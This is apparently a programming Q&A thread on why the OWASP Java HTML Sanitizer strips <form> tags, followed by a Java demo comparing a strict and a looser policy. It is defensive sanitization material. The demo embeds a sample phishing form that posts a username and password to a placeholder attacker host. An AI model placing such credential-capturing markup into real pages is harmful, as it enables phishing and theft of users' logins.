Sean Connolly

Reputation: 5801

XSS - OWASP HTML Sanitizer Filters <form>

I'm using the Java OWASP HTML Sanitizer (HtmlPolicyBuilder) to clean HTML being rendered in my web app, provided by 3rd party services.

Using some of the out-of-the-box options, I notice that <form> tags are removed. I understand that I can include them with allowElements("form"), but is there a good reason to not allow forms?

What sort of XSS attacks should I be thinking about when rendering others' forms on my website?


For reference, my sanitization policy is:

import org.owasp.html.HtmlPolicyBuilder;
import org.owasp.html.PolicyFactory;

// Policy factory used to clean third-party HTML before it is rendered
PolicyFactory policy = new HtmlPolicyBuilder()
    .allowCommonBlockElements()
    .allowCommonInlineFormattingElements()
    .allowStyling()
    .allowStandardUrlProtocols()
    .toFactory();

Upvotes: 1

Views: 1118

Answers (2)

pickle-weasle

Reputation: 21

As Sean pointed out someone could successfully phish some info from your users. To add a bit more info though, using just those canned methods, you'll have a pretty restricted whitelist, but perhaps that's what you want.

The elements you'd allow would be:

"b", "i", "font", "s", "u", "o", "sup", "sub", "ins", "del", "strong", "strike", "tt", "code", "big", "small", "br", "span", "em", "p", "div", "h1", "h2", "h3", "h4", "h5", "h6", "ul", "ol", "li", "blockquote".

allowStyling just allows the style attribute globally. allowStandardUrlProtocols would allow URLs with "http", "https", "mailto" protocols wherever you are referencing a URL (a:href, img:src, q:cite, etc.), but you don't allow any of these elements or attributes anyway, so it's essentially useless.

You may want to spend time looking online at example whitelists (not just for OJHS) to get an idea of commonly allowed elements & attributes to better develop your whitelist.

Upvotes: 2

Erlend

Reputation: 4416

One example is phishing. Display a username/password form, point the action parameter towards the attacker's web server, and trick users into believing they need to re-authenticate. Also if the users have autofill on, then the form could be automatically filled with username/password details.

Upvotes: 1
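The following is an added example (not code from the question or the answers) that runs the question's policy over a constructed sample of the re-login form Erlend describes, so you can verify for yourself that <form> and <input> are dropped, and then shows what a looser, hypothetical policy that admits forms would let through. The class name, the FORM_POLICY rules and the host attacker.invalid are assumptions made for the demo; the sanitizer API calls are the real org.owasp.html ones.

```java
import org.owasp.html.HtmlPolicyBuilder;
import org.owasp.html.PolicyFactory;

public class FormPolicyCheck {

    // The policy from the question, unchanged.
    static final PolicyFactory QUESTION_POLICY = new HtmlPolicyBuilder()
            .allowCommonBlockElements()
            .allowCommonInlineFormattingElements()
            .allowStyling()
            .allowStandardUrlProtocols()
            .toFactory();

    // Hypothetical looser policy: the minimum it takes for a third-party <form> to stay functional.
    // "action" is treated as a URL attribute, so allowStandardUrlProtocols() decides which hosts survive.
    static final PolicyFactory FORM_POLICY = new HtmlPolicyBuilder()
            .allowCommonBlockElements()
            .allowCommonInlineFormattingElements()
            .allowElements("form", "input")
            .allowAttributes("action", "method").onElements("form")
            .allowAttributes("type", "name").onElements("input")
            .allowStandardUrlProtocols()
            .toFactory();

    // Constructed sample of third-party markup: a "please sign in again" form whose
    // action points off-site (placeholder host), the phishing case from Erlend's answer.
    static final String UNTRUSTED = "<p>Your session expired, please <b>sign in</b> again.</p>"
            + "<form action=\"https://attacker.invalid/collect\" method=\"post\">"
            + "Username: <input type=\"text\" name=\"user\"> "
            + "Password: <input type=\"password\" name=\"pass\"> "
            + "<input type=\"submit\"></form>";

    static String sanitizeWithQuestionPolicy(String html) { return QUESTION_POLICY.sanitize(html); }
    static String sanitizeWithFormPolicy(String html) { return FORM_POLICY.sanitize(html); }

    // Post-sanitization check a reviewer can keep in a unit test: no form controls may remain.
    static boolean containsFormControls(String sanitized) {
        String s = sanitized.toLowerCase();
        return s.contains("<form") || s.contains("<input");
    }

    public static void main(String[] args) {
        // With the question's policy the form and its inputs are dropped; the surrounding text is kept.
        String strict = sanitizeWithQuestionPolicy(UNTRUSTED);
        System.out.println("question policy: " + strict + "  controls=" + containsFormControls(strict));
        // With the looser policy the form, its inputs and the off-site action attribute all survive.
        String loose = sanitizeWithFormPolicy(UNTRUSTED);
        System.out.println("form policy:     " + loose + "  controls=" + containsFormControls(loose));
    }
}
```

Compile against the owasp-java-html-sanitizer jar; the containsFormControls check is the kind of assertion worth keeping in your test suite so a later policy change that re-admits forms is noticed.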
